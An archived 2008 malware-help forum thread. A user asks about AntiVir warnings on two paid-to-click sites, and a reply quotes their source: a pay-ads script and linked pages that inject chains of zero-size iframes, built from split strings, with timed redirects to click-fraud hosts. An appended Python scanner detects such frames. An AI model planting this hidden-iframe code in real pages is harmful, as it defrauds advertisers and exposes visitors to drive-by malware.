CastleCops, Internet Crime Fighters

Malware detected by AntiVir, not others?

 
vk3ukf

Cadet
Joined: Dec 11, 2004
Posts: 4
Location: Australia

Posted: Thu Jun 05, 2008 10:27 pm    Post subject: Malware detected by AntiVir, not others?

Hello, I have been wandering around the PTC sites and found two recently that hammered me, every time.

I am using AntiVir, and it caught a pile of bad guys, I posted on a couple of the PTC forums about the sites, and a few reported that they were using Avast and AVG and that nothing had been reported to them or detected when they visited the sites.


OK, here are details of what happened.

I opened the buxtc website. Again the virus warnings straight away.

d3[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen

I quarantine it, straight away another warning.

c2[1].htm contains the detection pattern of the HTML script virus HTML/IFrame.Age.tih.

I quarantine it and straight away another warning.

t[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen

I quarantine it and straight away another warning.

portal[1].htm contains the detection pattern of the HTML script virus HTML/IFrame.13197

I quarantine it and straight away another warning.

anticheat[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen

I quarantine it and straight away another warning.

anticheat[2].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen

I quarantine it and straight away another warning.

index[9].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen

I quarantine it and straight away another warning.

click[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen

I quarantine it and straight away another warning.

Internet Explorer cannot open the Internet site hxxp://buxtc.com/

There is an OK button, I click it.
I am then forwarded to xxx.homeatyellow.com.au.


The two sites are buxtc and buxear.


My questions are,

Is this AntiVir catch a valid detection of malware?

and, if it is a valid detection,

Why aren't the other softwares mentioned catching them?

tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5869

MIRT Premium

Posted: Fri Jun 06, 2008 6:17 pm    Post subject:

I checked

Code:
http://buxtc.com/
but I couldn't see any malware. It may have been removed.


_________________
Got Windows XP? Help protect your PC from malware with Microsoft's anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
cconniejean

Trooper
Joined: Jan 16, 2008
Posts: 17
Location: USA

Posted: Sat Jun 07, 2008 3:08 am    Post subject:

I think a lot of that comes from the pay-ads.com script. I have seen that on many of the bux type sites. A form of cheating, click fraud. Pay-ads is known for this.

Code:
http://buxtc.com/ looking at their view source:
<script>ads_id="lolasrojas";b=window.document;b.write('<iframe src="http://www.pay-ads.com/ads.php?usr='+ads_id+'" width=480"'+'" height=60"'+'" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>');</script></p>


Looking at this one:
Code:
http://www.pay-ads.com/abc.js
Headers:
Date: Sat, 07 Jun 2008 01:54:00 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 21 May 2008 23:36:28 GMT
ETag: "7600f2-46b-10d37700"
Accept-Ranges: bytes
Content-Length: 1131
Connection: close
Content-Type: application/x-javascript

function jsmake(secs,surl){
if(--secs>0){
setTimeout("jsmake("+secs+",'"+surl+"')",1000);
}
else{
asbc.location.href=surl;
ccss.location.href=surl;
}
}
if (navigator.appName == 'Netscape')
var language = navigator.language;
else
var language = navigator.browserLanguage;

if (language.indexOf('zh') == -1)
{

temp_frame1='iframe' + ' name="bbcc"' + ' src="http://gobesthyip.com/ms.htm"' + ' width=0 height=0 marginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';
temp_frame2='iframe' + ' name="asbc"' + ' src="http://gobesthyip.com/c2.htm"' + ' width=0 height=0 marginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';
temp_frame3='iframe' + ' name="ccss"' + ' src="http://gobesthyip.com/d3.htm"' + ' width=0 height=0 marginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';
document.write('<' + temp_frame3 + '>');
document.write('</ifr' + 'ame>');
document.write('<' + temp_frame1 + '>');
document.write('</ifr' + 'ame>');
document.write('<' + temp_frame2 + '>');
document.write('</ifr' + 'ame>');
jsmake(45,'http://www.google.com/s.htm');
}



Code:
http://gobesthyip.com/ms.htm

<iframe width=0 height=0 frameborder=0 name="cbsearch" src='http://cb-search.com/cpi.php' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe width=0 height=0 frameborder=0 name="finds" src='http://finds123.com/cpi.php' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe width=0 height=0 frameborder=0 name="123" src='http://searchx123.com/cpi.php' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<script>
var keyword1 = new Array("", "", "http://nbcsearch.us/cpi.php");
var rand1 = Math.floor(Math.random() * 3);

temp_frame1='iframe' + ' name="BAG"' + ' src="' + keyword1[rand1] + '"' + ' width=0 height=0 marginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';

document.write('<' + temp_frame1 + '>');
document.write('</ifr' + 'ame>');
document.write(keyword1[rand1]);
</script>

<iframe width=0 height=0 frameborder=0 name="b9" src='' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe width=0 height=0 frameborder=0 name="bb8" src='' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<script>
function jsmake(secs,surl){
if(--secs>0){
setTimeout("jsmake("+secs+",'"+surl+"')",1000);
}
else{
b9.location.href=surl;
}
}

function jsks(secs,surl){
if(--secs>0){
setTimeout("jsks("+secs+",'"+surl+"')",1000);
}
else{
bb8.location.href=surl;
}
}

jsmake(3,'http://gobesthyip.com/9.htm');
jsmake(32,'http://www.google.com/s.htm');
</script>



Code:
http://gobesthyip.com/c2.htm

<html>
<br>
<iframe width=0 height=0 frameborder=0 src='http://nbcsearch.us/ak.htm' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe src="http://now-search.com/cpi.php" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://gogoppc.com/cpi.php" width="1" height="1" frameborder="0"></iframe>
<iframe width=0 height=0 frameborder=0 src='http://www.feedwithus.com/p.php?ref=seo2007' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<br>
<iframe width=0 height=0 frameborder=0 src='http://www.adtris.com/portal.php?ref=seo2007' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<br>



Code:
http://gobesthyip.com/d3.htm

<html>
<head>
<title>PTP page</title>
</head>
<iframe src="http://www.luxemil.com/search/portal.php?username=isearch8" width=0 height=0 frameborder=0 scrolling=no></iframe>
<iframe src="http://www.upperhits.com/index.php?id=lux3389" width="0" height="0"></iframe>
<iframe src="http://neoffic.com/t/?id=seoppc" width="480" height="60&quot; frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>
</html>


Buxear.com has their pay-ads running here:
Code:
<iframe name="I1" id="I1" src="http://www.buxear.com/css/" class="style1" marginwidth="0" marginheight="0" scrolling="no" border="0" frameborder="0" style="width: 8px; height: 1px">


Code:
http://www.buxear.com/css/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Documento sin t&iacute;tulo</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<script>ads_id="lolasrojas";b=window.document;b.write('<iframe src="http://www.pay-ads.com/ads.php?usr='+ads_id+'" width=480"'+'" height=60"'+'" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>');</script>
<body>
</body>
</html>
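
The hidden-frame patterns quoted in this thread (zero- or one-pixel iframes in the markup, and iframe tags assembled through document.write from split strings such as '</ifr' + 'ame>') can be flagged statically. The scanner below is an added example, not part of the original posts; its class and function names and the .example hosts in the sample are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

_CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")            # 'ifr' + 'ame' -> 'iframe'
_IFRAME = re.compile(r"(?<!/)\biframe\b([^>;]*)", re.I)  # skips closing </iframe>
_DIM = re.compile(r"""\b(?:width|height)\s*[=:]\s*["']?\s*(\d+)""", re.I)
_SRC = re.compile(r"""\bsrc\s*=\s*["']([^"']*)""", re.I)

def is_tiny(attr_text):
    """True if any width/height (attribute or CSS) is 0 or 1 pixel."""
    return any(int(n) <= 1 for n in _DIM.findall(attr_text))

class HiddenFrameScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._script = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
        elif tag == "iframe":
            size = " ".join(f"{k}={v}" for k, v in attrs if k in ("width", "height", "style"))
            if is_tiny(size):
                self.findings.append(("static", dict(attrs).get("src")))
    def handle_data(self, data):
        if self._script is not None:   # script text may arrive in several chunks
            self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            joined = _CONCAT.sub("", "".join(self._script))  # undo string splitting
            self._script = None
            for m in _IFRAME.finditer(joined):
                if is_tiny(m.group(1)):
                    src = _SRC.search(m.group(1))
                    self.findings.append(("script", src.group(1) if src else None))

def scan(html):
    scanner = HiddenFrameScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample; hosts are placeholders, not the domains from the thread.
SAMPLE = """<html><body>
<iframe src="http://banner.example/ad.php" width="480" height="60"></iframe>
<iframe src="http://hop1.example/cpi.php" width=0 height=0 frameborder=0></iframe>
<iframe src="http://hop2.example/css/" style="width: 8px; height: 1px"></iframe>
<script>t='iframe' + ' name="a"' + ' src="http://hop3.example/c2.htm"' + ' width=0 height=0 marginwidth="0" ';
document.write('<' + t + '>'); document.write('</ifr' + 'ame>');
</script></body></html>"""
```

`scan(SAMPLE)` reports the two static hidden frames and the script-built one, and leaves the 480x60 banner frame unflagged. A frame whose `src` is filled in from a variable at run time is reported with `None` as its source.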
